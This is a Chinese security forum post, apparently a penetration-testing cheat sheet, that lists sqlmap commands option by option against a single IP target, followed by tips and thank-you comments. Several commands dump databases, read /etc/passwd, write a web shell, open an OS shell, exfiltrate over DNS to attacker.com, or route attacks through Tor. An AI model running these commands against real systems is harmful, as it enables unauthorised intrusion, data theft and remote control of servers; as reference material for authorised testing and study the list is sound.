python sqlmap.py —update
python sqlmap.py -h
python sqlmap.py -h
python sqlmap.py —version
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -v 3
python sqlmap.py -d “mysql://root:root@192.168.126.128:3386/zkaq_databasename”
python sqlmap.py —wizard
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“
python sqlmap.py -m url.txt
python sqlmap.py -g “inurl:\”.php?id=1\”
python sqlmap.py -r request.txt
python sqlmap.py -l log.txt —scope=”(www)?.target.(com|net|arg)”
python sqlmap.py -c sqlmap.conf
python sqlmap.py -u “http://target_url/param1/value1*/param2/value2“
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ -p “username,id”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —skip “username,id”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —date=”username=admin&password=123”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1&username=admin&password=123“ —date=”username=admin;password=123” —param-del=”;”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —cookie=”security=low;PHPSESSID=121123131”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —cookie=”security=low;PHPSESSID=121123131 —-drop-set-cookie”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —user-agent=”aaaaaaaaa”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —random-agent
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —host=”aaaaa”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —referer=”aaaaaa”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —headers=”host:aaaa\nUser-Agent:bbbb”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —method=GET
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —auth-type Basic —auth-cred “user:pass”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —proxy=”http://127.0.0.1:8080/“
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —proxy=”http://127.0.0.1:8080/“ —proxy-cred=”name:pass”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —ignore-proxy
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —force-ssl
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —delay=”3”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —timeout=”10”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —retries=”1”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —randomize=”id”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —safe-url=”URL”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —safe-freq
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —time-sec=”3”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —union-cols 6-9
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —union-char 123
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —technique US
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —level 3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —risk 3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —predict-output
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —keep-alive
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —null-connection
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -o
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —threads=7
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —string=”woaini”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —skip-urlencode
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —eval=”import hashlib;hash=hashlib.md5(id).hexdigest()”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1” —dbms=”Mysql”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —os=”Windows”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —invalid-bignum
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —invalid-logical
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —no-cast
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —no-escape
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —prefix “‘)’”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —suffix “AND (‘abc’=’abc”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —tamper=”tamper/between.py,tamper/randomcase.py”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dns-domain attacker.com
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —second-order “http://1.1.1.1/b.php“
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -f
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -b
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —users
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dbs
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —schema
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -a
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -D database_name
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —current-user
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —current-db
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hostname
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —Privileges -U username
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —roles
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —tables
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -T table_name
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —columns
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ -C column_name
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —count
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —exclude-sysdbs
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —dump
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —start 3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —end 4
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —sql-query “select * from users”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —common-columns
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —common-tables
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —batch
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —charset=GBK
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —crawl=3
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —csv-del=”;”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —flush-session
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —force-ssl
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —fresh-queries
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hex
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —parse-errors
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —answer=”extending=N”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —check-waf
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —hpp
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —identify-waf
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —mobile
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —purge-output
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —smart
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —file-read=”/etc/passwd”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —file-write=”shell.php” —file-dest “/tmp/shell.php”
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —sql-shell
python sqlmap.py -u “http://59.63.200.79:8003/?id=1“ —os-shell
sqlmap.py -u http://navisec.it/123.asp?id=1 —tor -tor-type=SOCKS5 —tor-port=9050 —check-tor
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
奖励系统 | 100.00 | 0 | 2021-10-19 18:06:53 | 投稿满 10 赞奖励 |
苌偑 | 5.00 | 0 | 2021-10-12 22:10:22 | 一个受益终生的帖子~~ |
qsmx | 3.00 | 0 | 2021-07-30 10:10:15 | 一个受益终生的帖子~~ |
asd999 | 2.00 | 0 | 2021-07-30 10:10:59 | 一个受益终生的帖子~~ |
山屿云 | 10.00 | 0 | 2021-07-29 11:11:14 | 一个受益终生的帖子~~ |
zz风过无痕 | 5.00 | 0 | 2021-07-29 11:11:14 | 一个受益终生的帖子~~ |
nocircle | 1.00 | 0 | 2021-07-29 10:10:00 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
2677017545
发表于 2021-7-29
谢谢整理
评论列表
加载数据中...
spider
发表于 2021-7-30
评论列表
加载数据中...
asd999
发表于 2021-7-30
杰哥是真的帅!
评论列表
加载数据中...
qsmx
发表于 2021-7-30
谢谢整理
评论列表
加载数据中...
astronaut
发表于 2021-7-31
古德
评论列表
加载数据中...
一方
发表于 2021-8-5
好运来
评论列表
加载数据中...
834778976
发表于 2021-8-17
收藏收藏
评论列表
加载数据中...
xuejiuhan
发表于 2021-10-11
杰哥,yyds
评论列表
加载数据中...
yangroupaomo
发表于 2021-10-17
111111
评论列表
加载数据中...
治秃用霸王
发表于 2022-7-9
菜鸡路过
评论列表
加载数据中...